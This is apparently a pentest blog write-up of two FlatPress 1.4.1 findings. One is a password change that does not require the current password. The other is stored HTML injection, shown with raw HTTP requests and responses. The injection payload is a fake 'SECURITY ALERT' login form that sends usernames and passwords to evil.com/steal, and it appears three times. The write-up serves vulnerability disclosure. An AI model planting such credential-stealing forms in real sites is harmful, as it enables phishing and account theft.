Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description

- It was noted that the application did not require the current password for the password change functionality

Current Password not Required when Changing Password #1:

Steps to Reproduce:

1. Login with admin user and visit "Main" > "Configuration" > "General Settings"
2. Current password would not be required when changing the password

// HTTP POST Request

POST /FlatPressc4hak4mvef/admin.php?p=config&action=default HTTP/1.1

Host: demos5.softaculous.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0

[...]

_wpnonce=c1d6797fb9&_wp_http_referer=%2FFlatPressc4hak4mvef%2Fadmin.php%3Fp%3Dconfig&admin=admin&password=&confirm_password=&title=FlatPress&subtitle=My+FlatPress+blog&blogfooter=&author=test&www=http%3A%2F%2Fdemos5.softaculous.com%2FFlatPressc4hak4mvef%2F&email=demos%40softaculous.com&notify=on&startpage=%3ANULL%3A&maxentries=5&timeoffset=0&dateformat=%25A%2C+%25B+%25e%2C+%25Y&dateformatshort=%25Y-%25m-%25d&timeformat=%25H%3A%25M%3A%25S&lang=en-us&charset=utf-8&save=Save+Changes

// HTTP Response

HTTP/1.1 200 OK

Date: Sun, 21 Sep 2025 15:14:16 GMT

Server: FlatPress

[...]

Friday Fun Pentest Series - 41 - Stored HTML Injection - flatpressv1.4.1

Description

- It was noted that the application was vulnerable to Stored HTML Injection in the "Write Entry" functionality

Stored HTML Injection #1:

Steps to Reproduce:

- Login with admin user and visit "Main" > "New Entry" > "Write Entry" and in the description enter the payload below

[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]

// HTTP POST Request

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1

Host: demos5.softaculous.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0

[...]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=-- Selection --&imageselect=-- Selection --&content=[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish

// HTTP Response

HTTP/1.1 302 Found

Date: Sun, 21 Sep 2025 16:12:55 GMT

Server: FlatPress

[...]

// HTTP GET Request

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1

Host: demos5.softaculous.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0

[...]

// HTTP Response

HTTP/1.1 200 OK

Date: Sun, 21 Sep 2025 16:12:58 GMT

Server: FlatPress

[...]

[...]

<div itemprop="articleBody"><p><div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div></p></div>

[...]